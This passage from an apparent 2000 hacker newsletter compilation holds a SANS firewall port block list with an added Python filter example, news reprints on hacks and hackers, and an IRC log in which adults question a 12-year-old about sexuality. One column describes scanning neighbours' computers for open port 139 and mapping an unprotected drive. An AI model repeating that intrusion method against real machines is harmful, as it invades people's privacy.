      syslog (514/udp), SNMP (161/tcp and 161/udp, 162/tcp and 162/udp), BGP (179/tcp), SOCKS (1080/tcp) 
      
      ICMP-- block incoming echo request (ping and Windows traceroute), block outgoing echo replies, 
      time exceeded, and destination unreachable messages except "packet too big" messages (type 3, 
      code 4). (This item assumes that you are willing to forego the legitimate uses of ICMP echo 
      request in order to block some known malicious uses.) 
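
      The address and port rules above, written out as a border-filter decision function
      and run over constructed inbound packets (an added example, not part of the SANS
      text; ICMP and source-routing rules are not modelled). The site address block, the
      published servers and the external secondary are assumptions.

```python
import ipaddress as ipa

# Assumptions for this example (not from the SANS text): the site's address
# block and the hosts that are meant to be reachable from outside.
INTERNAL = ipa.ip_network("198.51.100.0/24")
DNS_SERVERS = {"198.51.100.53"}
EXTERNAL_SECONDARIES = {"203.0.113.53"}    # allowed to pull zone transfers
PUBLISHED = {
    ("udp", 53): DNS_SERVERS,
    ("tcp", 25): {"198.51.100.25"},        # external mail relay
    ("tcp", 80): {"198.51.100.80"},        # external Web server
    ("tcp", 443): {"198.51.100.80"},
}

# Sources that can never legitimately arrive from outside: the site's own
# block, RFC1918 space and network 127. Listed explicitly because
# ipaddress.is_private also covers other reserved ranges.
SPOOFED = [INTERNAL] + [ipa.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def ports(*items):
    """Expand ints and (low, high) ranges into a set of port numbers."""
    out = set()
    for item in items:
        if isinstance(item, tuple):
            out.update(range(item[0], item[1] + 1))
        else:
            out.add(item)
    return out


# The port list above, transcribed. 139/tcp appears there under both login
# services and NetBIOS; it is kept once, under NetBIOS.
BLOCKED = {
    "tcp": {
        "login services": ports((21, 23), (512, 514)),
        "RPC and NFS": ports(111, 2049, 4045),
        "NetBIOS": ports(135, 139, 445),
        "X Windows": ports((6000, 6255)),
        "naming services": ports(53, 389),
        "mail": ports(25, 109, 110, 143),
        "web": ports(80, 443, 8000, 8080, 8888),
        "small services": ports((0, 19), 37),
        "miscellaneous": ports(79, 119, 123, 515, 161, 162, 179, 1080),
    },
    "udp": {
        "RPC and NFS": ports(111, 2049, 4045),
        "NetBIOS": ports(135, 137, 138, 445),
        "naming services": ports(53, 389),
        "small services": ports((0, 19), 37),
        "miscellaneous": ports(69, 514, 161, 162),
    },
}


def decide(src, dst, proto, dport):
    """Return (verdict, reason) for one inbound packet at the border."""
    src_ip = ipa.ip_address(src)
    if any(src_ip in net for net in SPOOFED):
        return ("block", "spoofed source address")
    if ((proto, dport) == ("tcp", 53) and src in EXTERNAL_SECONDARIES
            and dst in DNS_SERVERS):
        return ("allow", "zone transfer from external secondary")
    if dst in PUBLISHED.get((proto, dport), ()):
        return ("allow", "published server")
    for label, portset in BLOCKED.get(proto, {}).items():
        if dport in portset:
            return ("block", label)
    # The list is a minimum; blocking all unused ports is the better rule.
    return ("allow", "not on the minimum block list")


# Constructed inbound packets: (source, destination, protocol, dest port).
SAMPLE_PACKETS = [
    ("10.1.2.3", "198.51.100.80", "tcp", 80),
    ("198.51.100.7", "198.51.100.9", "tcp", 22),
    ("203.0.113.9", "198.51.100.80", "tcp", 80),
    ("203.0.113.9", "198.51.100.14", "tcp", 80),
    ("203.0.113.53", "198.51.100.53", "tcp", 53),
    ("203.0.113.9", "198.51.100.53", "tcp", 53),
    ("203.0.113.9", "198.51.100.14", "udp", 161),
]


def run_sample():
    """Evaluate every sample packet and return the list of decisions."""
    return [decide(*pkt) for pkt in SAMPLE_PACKETS]


if __name__ == "__main__":
    for pkt, (verdict, reason) in zip(SAMPLE_PACKETS, run_sample()):
        print(pkt, "->", verdict, "(" + reason + ")")
```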
      
       
      Signatories: 
      
      Randy Marchany, Virginia Tech
      Scott Conti, University of Massachusetts
      Matt Bishop, University of California, Davis
      Sten Drescher, Tivoli Systems
      Lance Spitzner, Sun Microsystems GESS Security Team
      Alan Paller, SANS Institute
      Stephen Northcutt, SANS Institute
      Eric Cole, SANS Institute
      Gene Spafford, Purdue University CERIAS
      Jim Ransome, Pilot Network Services
      Frank Swift, Pilot Network Services
      Jim Magdych, Network Associates, Inc.
      Jimmy Kuo, Network Associates, Inc.
      Igor Gashinsky, NetSec, Inc.
      Greg Shipley, Neohapsis
      Tony Sager, National Security Agency 
      Larry Merritt, National Security Agency
      Bill Hill, MITRE
      Steve Christey, MITRE
      Viriya Upatising, Loxley Information Services Co.
      Marcus Sachs, JTF-CND, US Department of Defense
      Billy Austin, Intrusion.com
      Christopher W. Klaus, Internet Security Systems
      Wayne Stenson, Honeywell
      Martin Roesch, Hiverworld, Inc.
      Jeff Stutzman, Healthcare ISAC
      Ed Skoudis, Global Integrity
      Gene Schultz, Global Integrity
      Kelly Cooper, Genuity
      Eric Schultze, Foundstone
      Bill Hancock, Exodus Communications
      Ron Nguyen, Ernst & Young
      Lee Brotzman, NASIRC, Allied Technology Group, Inc.
      Scott Lawler, DoD Cert
      Hal Pomeranz, Deer Run Associates
      Chris Brenton, Dartmouth Institute for Security Studies
      Bruce Schneier, Counterpane Internet Security, Inc.
      Nick FitzGerald, Computer Virus Consulting Ltd.
      Shawn Hernan, CERT Coordination Center
      Kathy Fithen, CERT Coordination Center
      Derek Simmel, Carnegie Mellon University
      Jesper Johansson, Boston University
      Dave Mann, BindView
      Rob Clyde, Axent
      David Nolan, Arch Paging
      Mudge, @stake  

      The following is a list of people who have helped make this document better through 
      their contributions: 
      
      Robert Harris 
       
      
      (c) 2000 SANS Institute  :  Office 301.951.0102  :  Registration 719.599.4303  :  
      Web Contact scott@sans.org
       
      @HWA  
      
      
      
      
258.0 [0x4] Justin Tanner aka Agent Steal in amazing plot escapes again.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
       
       AP: New w0rld Media       
       
       Exclusive to the Norton Rambler
       Tony Crosslink reports.
       
       Justin Tanner had been spending time in prison wisely. By incorporating
       secret yoga techniques and remaining on a diet of only his own urine,
       insects and St John's Wort with ginseng snaps, he was able to lose weight
       and gain the dexterity necessary to hide his body in the cavity of his 
       wooden leg.
       
       "It appeared to be just laying there by itself, I assumed Mr Tanner
       was in the exercise yard," said a bewildered prison guard. The guard,
       50 yr old Cliff Draper, had picked up the apparently mislaid prosthetic
       and moved it, unaware of the concealed Tanner, to an unsecured location.
      
       After waiting 4 hrs cramped inside the leg hollow of the limb he 
       squeezed out just before clamp down and made good his escape in a 
       laundry hamper.
       
       AP
       
       <satire>
       
       @HWA
          
       
259.0 [IND] Peeping Through Port 139
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 2 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060500a_j.shtml
           
      
      6/2/00
      Peeping Through Port 139
      
      I couldn't believe it. There, before me on my computer screen, was a 
      directory filled with family photos, labeled by name. I could have looked 
      at pictures of these folks if I'd cared to. It wasn't my family, though, 
      and these photos weren't on my computer. I had no idea whose computer they 
      were on, but I guessed it was someone in my apartment building, and that 
      they hadn't a clue I was spying on them.

      Many of us here in my building get Internet access through cable modems. 
      Few know of the security risks. Now that high-speed access to the Internet 
      can be had through cable and digital subscriber lines (DSL), security 
      holes are easier to exploit. They're easy to fix too, but few are, 
      probably because few people know about the breaches in the first place. 
      Certainly, the cable guy who hooked me up never told me that Windows, in 
      effect, offers an Internet party line to my hard drive. I'm guessing that 
      at least three of my neighbors weren't informed either.

      How easy is it to tap into a neighbor's computer if it isn't secured 
      properly? Insanely easy, I learned after a recent night of experimenting. 
      It doesn't take any networking savvy -- just the right program and some 
      anti-social attitude.

      One such program is called SMBScanner. It took me about 10 minutes to find 
      on the Internet. Like a police scanner monitoring many frequencies, this 
      software rolls through Internet-protocol (IP) numbers (Internet addresses 
      of nine digits separated by periods, the online equivalent to phone 
      numbers), checking for open ports on computers. Now, a cable company like 
      the one I use usually reserves blocks of successive IP numbers for 
      customer use. So I figured my neighbors would have numbers nearly 
      identical to mine, probably varying only in the last two digits. 
      SMBScanner paid a visit to each of these addresses, checking to see if 
      port 139 -- the connection point computers often use to network with one 
      another -- was open. Within minutes, it found three.

      From there, it was just a matter of employing the operating system's 
      user-friendly ability to "map" another computer's hard drive to its own 
      file system. This was a snap, given that two of the three computers had no 
      password protection whatsoever. One poor user actually had a printer 
      online. I pondered printing him or her a page reading YOU'VE BEEN HACKED! 
      But what good would such a missive be if I couldn't enjoy the other 
      person's surprise upon receiving it? Anyway, it was probably best to 
      remain in stealth mode for this fact-finding mission. So I mapped someone 
      else's C drive instead, giving me access to its contents. And that's when 
      I found the directory named "Family Photos."

      That's also when I chickened out. I couldn't nerve myself up to actually 
      look at any of the snapshots. I felt guilty enough already for having 
      snooped this far. So I disconnected. My point was made. I didn't actually 
      want to peer into somebody else's computer; I just wanted to see if I 
      could do it.

      Anyone who has a high-speed Internet connection (and wants to avoid having 
      done to them what I nearly did to my neighbors) should take the ShieldsUp 
      security test offered by the Gibson Research Corp. (GRC, grc.com), run by 
      computer guru Steve Gibson. It's where I learned about these 
      vulnerabilities. GRC's Web site tests your computer to see what ports it 
      can wiggle into. It's an eye-opener.

      How does this happen? It's a weird amalgamation of factors, a snafu that 
      only surfaces when home networking, dedicated Internet lines, and people's 
      steadfast refusal to use passwords are combined.

      Start with someone tying two computers together. According to GRC, when 
      "Microsoft's networking client is installed, a default setting which would 
      have protected many millions of computers if it were normally set to 'off' 
      is instead set to 'on.'" Upshot? A home network is left open to the entire 
      Internet. What is odd about this is that it is totally unnecessary. This 
      option was set to "on" only to save Microsoft in customer-service calls, 
      the Gibson site contends.

      Until recently, the pitfalls of home networking were limited, as most 
      networked Netters went online with dial-up connections, which were 
      assigned IPs more randomly. They remained online for limited periods of 
      time and so were harder to pinpoint. But as more people set up networks 
      and use connections that are always "on," it is starting to make for a lot 
      of sitting ducks.

      And there are a lot of clandestine hunters out there. Here are computers 
      that remain online for long stretches of time, with easily discoverable IP 
      numbers. What better place than on somebody else's computer to spend some 
      time nosing around, looking for free software or just some neighborly 
      dish?

      I asked a system administrator who used to work for one of Baltimore's 
      Internet service providers how much port-scanning he used to see. "The 
      amount was staggering," he responded by e-mail -- about once a minute, 
      some unknown computer cracker would test the lines, looking for an in. The 
      friend's employer blocked that sort of traffic from reaching its 
      customers, at least that from folks with other ISPs. It didn't stop this 
      company's customers from snooping on each other, though, as I'd snooped on 
      my neighbors.

      GRC provides an easy explanation of how to secure port 139. All it 
      involves is a few points and clicks. The biggest challenge is letting 
      people know.
      
      
      C Y B E R P U N K
      By Joab Jackson
      http://www.citypaper.com/2000-05-03/cyber.html 
      
      Just like reverse TV: joabj@charm.net. 
      
      
      @HWA
      
260.0 [IND] Hacker Hits Road Runner Server;
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 2 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060500b_j.shtml     
      
      6/2/00
      Hacker Hits Road Runner Server;
      Subscribers Need New Passwords
      
      
      Houston subscribers to Time Warner Communications' Road Runner cable-modem 
      Internet service were told Thursday night to change their passwords after 
      a hacker broke into an e-mail server.

      But a glitch in a computer prevented customers from making the change 
      Thursday evening.

      Spokeswoman Kimberly Maki said the hacker may have gotten access to a 
      database of e-mail logons and passwords on Wednesday.

      Road Runner technicians noted suspicious activity on the network and 
      disabled the hacker's cable modem about 30 minutes after the intrusion 
      started, she said. The hacker tried to come back in via the Internet later 
      and was stopped again.

      Maki said technicians would complete a planned upgrade of the Road Runner 
      system Thursday night and use the opportunity to increase security.

      Customers were e-mailed instructions for changing their passwords on 
      Thursday.

      A technical support staffer said Thursday the computer used to update 
      customer information was down and likely would be back up sometime today.

      Maki said Road Runner managers believe they identified the hacker and 
      notified law enforcement officials. 
      
      By DWIGHT SILVERMAN 
      Copyright 2000 Houston Chronicle
      June 1, 2000, 7:57PM 
      
      http://www.chron.com/cs/CDA/story.hts/business/568293 
      
      @HWA
      
261.0 [IND] Swedish Hacker-Tracker Is FBI And Media Darling
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 12 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061200a_j.shtml     
      
      6/12/00
      Swedish Hacker-Tracker Is FBI And Media Darling
      By Eva Sohlman
      
      STOCKHOLM (Reuters) Saturday June 10 10:26 PM ET- The FBI, desperate to 
      track down the source of the ``Love Bug'' computer virus last month, 
      turned to a shy 19-year-old Swedish student.

      Jonathan James came under the media spotlight after he helped the world's 
      most famous crime-busting agency trace the origins of the virus that 
      caused billions of dollars in damage to computers around the world.

      But right now he is more interested in getting through his school exams 
      and enrolling in law school later this year.

      In recent weeks more than 150 foreign journalists have called James or 
      traveled to his home -- a country cottage a short distance outside the 
      university town of Uppsala -- to get his story.

      James is unfazed by the media attention. He is concentrating on finishing 
      his school exams this month and is setting up a joint venture for computer 
      security solutions.

      The journalists are not the only ones to court James.

      The U.S. Federal Bureau of Investigation (FBI) calls him several times a 
      week to discuss security issues and ways of tracing computer hackers.

      The first time they contacted him, he said, was when he had tracked down 
      the creator of the ``Melissa'' virus in 1999 -- something the FBI still 
      have not acknowledged officially.

      ``Well, I suppose it's hard to admit someone else did their job,'' James 
      told Reuters.

      He recalled how they seemed to expect him to be honored by their call and 
      spoke to him condescendingly. ``But I called them by their first names and 
      that cooled them down.''

      James says he is not interested in hacking or computer games, and denied 
      that he was working on a new virus.

      With the media frenzy surrounding ``Melissa'' still fresh in his mind, he 
      told the FBI he would not help track the ``Love Bug'' when it emerged at 
      the beginning of May.

      ``I had decided that this time they would have to do it on their own but 
      then I had a few hours left over on the Sunday...,'' he said.

      James decided to try to find out who was behind the virus when another 
      Swede pointed the finger at a German student.

      Within hours he had gathered information on some well-known hackers' 
      styles of programming and found one which had elements in common with the 
      ``Love Bug.''

      The next day, the Washington Post, drawing on U.S. officials, reported 
      James' findings as the most crucial and later in the day a 24-year-old 
      Philippine computer student who had submitted a thesis describing a 
      program similar to the virus, was arrested.

      The FBI had come to the same conclusion, James says.

      The only difference was that it had taken them days.

      U.S. security expert Richard M. Smith said many computer experts had taken 
      part in the virus hunt but that James was the single most important 
      player.

      ``Jonathan found extremely important clues and if he hadn't been around it 
      would have taken some more days to find the guy,'' Smith said.

      International Top-Hacker Career Not On The Agenda

      But a career as a professional hacker, working for the world's most 
      sophisticated intelligence services, does not appeal to James.

      ``I want to be my own boss and decide myself what I should or shouldn't 
      do,'' he said.

      He will start law studies at university later this year.

      ``I've wanted to study law since I was nine -- even before I got into 
      computers -- and I think it could be fruitful to combine it with 
      computers.''

      James says he is interested in security programming computers because it 
      resembles the language studies that fascinate him.

      Studies in Greek, German, English and Latin help him to trace the origins 
      of words -- something he says he enjoys while reading.

      The Swedish spy story writer Jan Guillou and American author John Grisham 
      are his favorite writers.

      In the little spare time he has James practices martial arts, listens to 
      all kinds of music, especially American hip-hop, and hangs out with his 
      half-English family who have helped him keep his feet firmly on the ground 
      during the media circus.

      He tells of the time a journalist from French television was standing 
      outside his house at 9.30 in the morning and caught him in his underwear.

      ``I was only wearing boxer shorts and there she was. She never wanted to 
      leave but just sat there on our sofa and left around one o'clock in the 
      afternoon.''

      Governments Lax On Security

      James said he could not understand computer crime or why some people 
      seemed to get a thrill from it.

      ``It's just vanity that seems to drive those hackers,'' he said.

      He criticized governments for being too lax with security, adding that he 
      had found a big security hole in the homepage of Sweden's ruling Social 
      Democrats but it took three weeks before it was sorted out.

      He thinks worries about the security of on-line shopping are over-hyped 
      because it is much harder to obtain credit card numbers without being 
      traced than most people believe.

      On the other hand there is no such thing as a 100 percent safe Web site, 
      he concluded. 
      
      @HWA
      
262.0 [IND] Hackers Force HK Government Website to Shut Down Again
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      6/12/00
      Hackers Force HK Government Website to Shut Down Again
      8:49 Monday 12 June 2000 
      AFP
      
      HACKERS launched a further attack on a Hong Kong government website 
      yesterday, forcing officials to close the site down for the second time in 
      less than 24 hours, a spokesman said.

      The government decided to temporarily shut down the Interactive Government 
      Services Directory website "to solve problems created by two defacement 
      cases over the weekend", it said in a statement.

      "We resumed service at 2 am today after a defacement yesterday, but the 
      website was still subjected to further attacks," the government spokesman 
      said yesterday.

      Hackers attacked the site in the afternoon following an attack on Saturday 
      which forced the site to shut down for more than 10 hours.

      "The other government websites have not been affected," the spokesman 
      said.

      "The outward symptoms of the two attacks are similar with the homepage 
      being defaced and replaced by messages," he said.

      The government shut down the affected homepage yesterday after the 
      messages "Own3d by the Crows" and "hacked by O Analista" were found 
      posted on the site.

      Analista means analyst in Spanish.

      Police were investigating the case, the government statement said.

      The government successfully fended off two attempts to hack into its website last year.
      
      http://www.it.fairfax.com.au/breaking/20000612/A61920-2000Jun12.html 
      
      @HWA
      
 263.0 [IND] Dozens of Malaysian Political Web Sites Hacked
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 12 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061200c_j.shtml
      
           
      Dozens of Malaysian political Web sites hacked 
      By The Associated Press
      Special to CNET News.com
      June 11, 2000, 8:45 a.m. PT 
      
      KUALA LUMPUR, Malaysia--Hackers have broken into dozens of Malaysian 
      political Web sites, leaving government officials and opposition leaders 
      fuming today over images of rotting skulls and obscene messages. 

      One vandal, calling himself "Xenophoria," attacked 21 pro-government Web 
      sites, posting a list of demands for greater press freedom and an end to 
      corruption. 

       
      "Stop government intervention in media. Justice for all," the hacker 
      wrote. 

      Cyberspace has been a fierce battleground for Malaysian politics in the 
      past year, with more than 100 anonymously run Web sites fueling debate 
      over the country's leadership and laws. 

      Opposition leaders rely heavily on the Internet to drum up support, 
      because they say the tightly controlled mainstream press is biased. 

      The government, however, often plays down the Internet's potential impact 
      on voters in Malaysia, where many of the country's 22 million people live 
      in rural areas with limited Internet access. 

      Both sides have so far condemned the hacking, which apparently began 
      Friday, and vow to expose the culprits. 

      "We don't condone such foolish conduct," said Tian Chua, vice president of 
      the opposition National Justice Party. "These are unreasonable acts of 
      cowardice which benefit neither the government nor the opposition." 

      A popular opposition Web site called "Laman Reformasi," or "Reformation 
      Site," was reported to have been attacked first. 

      The vandal, who identified himself as "Junior Hacker," posted several 
      obscene pictures on the Web site, in an apparent reference to jailed 
      politician Anwar Ibrahim, who is on trial for sodomy. 

      Opposition loyalists retaliated by penetrating their rivals' Web sites and 
      branding supporters of the government as "fanatics." 

      Politics online surged shortly after Prime Minister Mahathir Mohamad 
      sacked Anwar as his deputy in September 1998, calling him an immoral 
      homosexual. 

      Anwar was subsequently sentenced to six years in jail for corruption and 
      faces another twenty years if convicted of sodomy. He claims Mahathir 
      orchestrated a conspiracy to oust him. 

      Copyright 2000 Associated Press. All rights reserved. This material may 
      not be published, broadcast, rewritten, or redistributed. 
      
      
      
      @HWA
      
      
 264.0 [IND] Youth Nabbed in Singapore for Hacking in Australia
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 12 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061200d_j.shtml     
      
      6/12/00
      Youth Nabbed in Singapore for Hacking in Australia
      9:08 Monday 12 June 2000 
      
      DPA
      
      AN INDONESIAN youth who hacked into the computer server of a Singapore 
      research and development institute while studying in Australia was 
      arrested on coming to the city-state to study, it was reported on 
      Saturday.

      The 15 year-old boy, who was released on 10,000 Singapore dollars 
      ($A11,834) bail, was nabbed at his relative's apartment and his new 
      computer seized, The Straits Times said.

      Police said the student hacked into the server at the Data Storage 
      Institute when he was in Australia during March and April.

      The boy learned from an Internet chatroom that the institute's network was 
      vulnerable and could be hacked into easily, they said.

      He continued hacking into the system after arriving in Singapore to study 
      English and mathematics and was tracked down by the police Computer Crime 
      Branch.

      A specialist at the institute had found unauthorised computer programmes 
      within the system and unauthorised user accounts in operations. Some of 
      the connections were made through overseas computer systems.

      A spate of hacking incidents has prompted Singapore judges to slap jail 
      sentences on youthful offenders instead of probation.

      Police said they were continuing their investigation into the latest case.
      
      http://www.it.fairfax.com.au/breaking/20000612/A61943-2000Jun12.html 
      
      
      @HWA
      
265.0 [IND]Facing a Mans World:Female Hackers Battle Sexism to Get Ahead
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 12 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061200e_j.shtml     
      
      6/12/00
      http://abcnews.go.com/sections/tech/DailyNews/hackerwomen000609.html
      Facing a Man's World
      Female Hackers Battle Sexism to Get Ahead
      
      The experience of women at the entry levels of the hacking scene, mostly in
      online chat groups, is one of relentless sexual harassment. It is a hard 
      battle for women to be respected in a culture dominated by teenage boys.
      
      By Sascha Segan
      
      June 9 -- For women hackers, there's a different kind of glass ceiling to break.
      Hacking has traditionally been a man's world. But women are quietly breaking
      into the hacker subculture, a loose group of computer enthusiasts who meet 
      in online chat rooms and at real-life conventions.
      
      Not surprisingly, as in other male-dominated spheres, these women are often
      harassed and mocked by certain insiders -- though here it is by teenage boys,
      who make up most of the entry levels of hackerdom.
      
      The chat rooms where beginning hackers often learn technical tricks are 
      stocked with "little hacking boys from hell -- how awfully rude they are, and how
      intelligent they are," according to a hacker who goes by the handle Natasha 
      Grigori and heads antichildporn.org, an organization of hackers who track down
      child pornographers on the Net.
      
      R-E-S-P-E-C-T
      
      But the few female hackers don't network with each other -- in fact, some of their
      greatest trouble comes from other women, called "scene whores" -- hacker groupies
      who use sex to get ahead. Fortunately, the few women who break through to the 
      elite ranks of hacking find that at the top, what matters is your technical skills,
      not your gender.
      
      "If you can match their [male hackers] skill level and better it, they'll give 
      you every ounce of respect. It's when a female comes in and tries to play on 
      her being feminine, that doesn't get you anything," says Blueberry, a 32-year-old
      woman from Brisbane, Australia, who founded condemned.org, another anti-child 
      porn organization.
      
      ABCNEWS.com spoke to more than a dozen female hackers from the United States, 
      Australia and New Zealand for this two-part series. Last week's piece 
      looked at who the female hackers are; this week, we examine the challenges 
      they face.
      
      A note about names: Like most hackers, these women choose to go by online 
      handles. Real names will be specifically marked as such.
      
      Hackers vs. Scene Whores
      
      Courtnee, a 20-year-old hacker from the Pacific Northwest, says the prevalence
      of hacker groupies makes it more difficult for true female hackers to get respect
      (www.twistedlens.com)   
      
      There are plenty of women at hacker conventions -- they're just not all hackers.
      Some are girlfriends, some wives. But the female hacker's nemesis is the "scene 
      whore." These latex-clad hacker groupies haunt conventions and offer teenage boys 
      cybersex in chat rooms to boost their own self-esteem, female hackers say.
      
      "The average woman, in today's society, could remain unnoticed," says Blaise,
      a 29-year-old woman from New Zealand. "Looking at an average woman in a 
      computer society that consists of mainly antisocial men, she will be the 
      center of attention. It's those girls that give every woman a reputation
      ...and that's what you have to prove yourself against before you gain any
      respect."
      
      And the prevalence of scene whores has shattered any female solidarity that
      might exist among the hacker community, as groupies fight over the most 
      highly skilled men and real female hackers fight the boys' assumption that
      all women in the scene are groupies.
      
      "When I first started in the scene, this one person said, you know, 'you can
      be my cyberwhore and you'll be elite through association,'" says Blueberry, 
      who says she rejected the advance.
      
      Dark Tangent, head of Defcon and a prominent male hacker, remembers a scene 
      whore having videotaped sex with a male hacker in an elevator at the 
      convention's Las Vegas hotel. He warns of evil groupies who condition poorly
      adjusted male hackers to think of women as sex toys.
      
      Natasha says she regularly has to throw women out of the IRC chat room that
      she hosts because they disrupt the tech talk by offering cybersex to her teenage
      charges.
      
      "It's really bad as far as the women ripping each other to shreds. This whole 
      cybersex thing really bothers me," Natasha says. 
      
      A_kitten, a 34-year-old woman from California whose Web site features sexy photos 
      of herself, has been described as everything from a scene whore to a Cult leader
      by terrified male hackers unwilling to give names to a reporter for fear of her 
      legion of groupie script kiddies who used to crash sites on her command. 
      
      She doesn't deny using her femininity to get her way in a male-dominated society. 
      "People just assume that since I am a girl and I have that power that I must be 
      abusing it," she says. "I think some guys are intimidated or offended by the natural
      power that women possess."
      
      But St. Jude Milhon, a prominent hacker from Berkeley, Calif., doesn't see using
      feminine wiles as part of the spirit of hacking. "It wouldn't be sporting. Simply
      be present, honest, reasonably competent, female, and everyone's aghast."
           
      
      Fighting to Be Heard
      
      But it's a hard battle for women to be respected in a culture dominated by teenage boys.
      The experience of women at the entry levels of the hacking scene, mostly in online chat 
      groups, is one of relentless sexual harassment. 
      
      British sociologist Paul Taylor, author of Hackers: Crime in the Digital Sublime, terms 
      this the Wild, Wired West, a rough-and-tumble social environment determined by the 
      attitudes of insecure teenage boys trying to impress each other with typed testosterone.
      
      "It's almost like some Lord of the Flies-type environment," he says, referring to William
      Golding's novel about a group of teenage boys who descend into feral savagery when cut 
      off from civilization. 
      
      The anonymity of online interaction also fuels sexual harassment, making it more difficult
      to enforce social rules and freeing the most maladjusted young men to take out their sexual
      frustrations on people with feminine handles, Taylor says.
      
      "The first time I posted, I posted with a woman's nickname. I was ripped to shreds: 'You're 
      a woman, get off here, we're not going to help you,'" Natasha says. When RosieX, founder of
      the Australian cyberfeminist magazine GeekGirl, got into the online bulletin board scene in
      1990, she found women so intimidated by that attitude that they pretended to be male to avoid
      harassment.
      
      "I was frustrated, because I wanted to learn skills and all the boys wanted to do was f---,"
      she says.
      
      Even a_kitten, who takes pride in her power over those boys, sneers at them. 
      
      "For every 50 jerks on IRC, I stumble upon one nice guy that I can talk to," she says.
      
      Non-Sexist Elite
      
      But the sexual gantlet seems to fade with experience. Defcon's Dark Tangent says top-rank
      hackers generally stay away from the IRC channels, waiting to see whose thirst for knowledge
      is great enough to survive the savage atmosphere. To them, skill is all that matters, not the 
      body it comes in.
      
      "When you interact with people such as the L0pht, or the cDc or the most experienced members of
      the hacker culture, gender is a non-issue. It's what you know that matters, and less who you are,"
      says Javaman, a Philadelphia-area hacker. "There is sexism at the lowest levels, but among the 
      more skilled people, the more able people, it really is a non-issue."
      
      And at conventions, hackers seem to love nothing more than a woman who can fix a network 
      breakdown. Though they're tormented online, for some reason the rare women in hacking are
      treasured in person, female hackers say.
      
      "Girls are victimized only in the bodiless state -- in the flesh, they're objects of wonder and
      fascination," says Milhon.
      
      @HWA
      
      
266.0 [IND] Social study: staunch religious hackers?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      (url pulled)      
      
      Interesting discussion sent in detailing something about religion and how it affects
      the modern hacker culture, or is it just some guy taking the piss out of some _____r
      h___ r_____s? - Ed
      
            
      Submitted by: Mehmet Ali Agca and the Christpunchers

       Starting logfile IrcLog
      IRC log started Mon Jul 10 13:27:27 2000
       Value of LOG set to ON
      <Holysmoke> cool noticed that a couple of new ones have been added
      <ShermAway> yes
      <wreath> servers up to 124 now!
      <ShermAway> IOM has set up quite a few specialist channels on ccnet
      <joshua_4_jesus> i've been asking jesus what to do
      <ShermAway> including #cult_outreach, #abuse_outreach, #youth_outreach, #porn_outreach etc
      <Denis> I just read the doctrinal statement on the web page.  I was impressed.
      <joshua_4_jesus> but i just can't find the answeres
      <joshua_4_jesus> can anyone help?
      <Denis> What is your question joshua?
      <ShermAway> what about joshua?
      <joshua_4_jesus> ok
      <ShermAway> r u from a gay background joshua?
      <joshua_4_jesus> i know the bible teaches me not to be gay
      <joshua_4_jesus> but i'm lusting over this guy that is also gay
      <joshua_4_jesus> i know lust is a sin
      <ShermAway> would u like to read an email i wrote about ministering to gays?
      <joshua_4_jesus> but i can't control my urges
       SignOff wreath: #Gay_Outreach (Connection reset by peer)
      <joshua_4_jesus> what should i do?
      <Denis> It only feels like you can not control your urges joshua, God says that you CAN control them with His help.  One aspect of the fruit of the Spirit is *self-control*
      <ShermAway> well for a start joshua u have to realise you cannot do this in your own strength
      <ShermAway> we are powerless to fight sin in our own strength
      <ShermAway> the bible calls that striving
      <joshua_4_jesus> amen
      <joshua_4_jesus> but how do i do that?
      <ShermAway> and we set ourselves up for a fall when we do
      <ShermAway> we must rely on Gods ability to deliver us from temptation
      <ShermAway> and to set us free from the works of the flesh
      <joshua_4_jesus> temptation is strong, though
      <ShermAway> yes it is.....
      <ShermAway> how old r u joshua?
      <joshua_4_jesus> 12
      <ShermAway> hmm
      <ShermAway> really?
       Adri [CCNet6.0@edtn013749.hs.telusplanet.net] has joined #Gay_Outreach
      <joshua_4_jesus> yes
      <Denis> josh, have you given in to your lusts and had sex with anyone?
      <Eagle^> how olds this other boy Jushua?
      <joshua_4_jesus> Denis: no
      <Denis> Good!
      <joshua_4_jesus> Eagle^: i don't know
      <Eagle^> ok
      <ShermAway> are u a christian josh?
      <joshua_4_jesus> ShermAway: hardcore 100%
      <ShermAway> :)))
      <ShermAway> good
       Guest42617 [JAVGUEST@98AF8102.ipt.aol.com] has joined #Gay_Outreach
      <ShermAway> do u believe God can help u?
       Guest42617 is now known as Tzadok
      <Tzadok> Hi Sherm
      <Denis> josh, work like crazy NOT to do it brother.  Right now you have no experiential history that can be used to draw your further into sin.  Make a real strong cimmittment not to give into you desires.
      <joshua_4_jesus> ShermAway: yes
       Tzadok was kicked off #gay_outreach by ShermAway (ShermAway)
       mode/#Gay_Outreach [+b *!*@98AF8102.ipt.aol.com] by ShermAway
      <ShermAway> autoban on him folks
      <ShermAway> hes a troublemaker
      <ShermAway> josh - do u read your bible?
      <Denis> Growing up in Jesus is all about saying no to the evil desires that we face.  That is part of what it means to become a man.
      <joshua_4_jesus> ShermAway: not as much as i should
      <ShermAway> ok do u where 1 corinthians is?
      <joshua_4_jesus> i love god and i want him to be my best friend.  he is my home boy.
      <joshua_4_jesus> ShermAway: yes
      <ShermAway> ok look up this verse
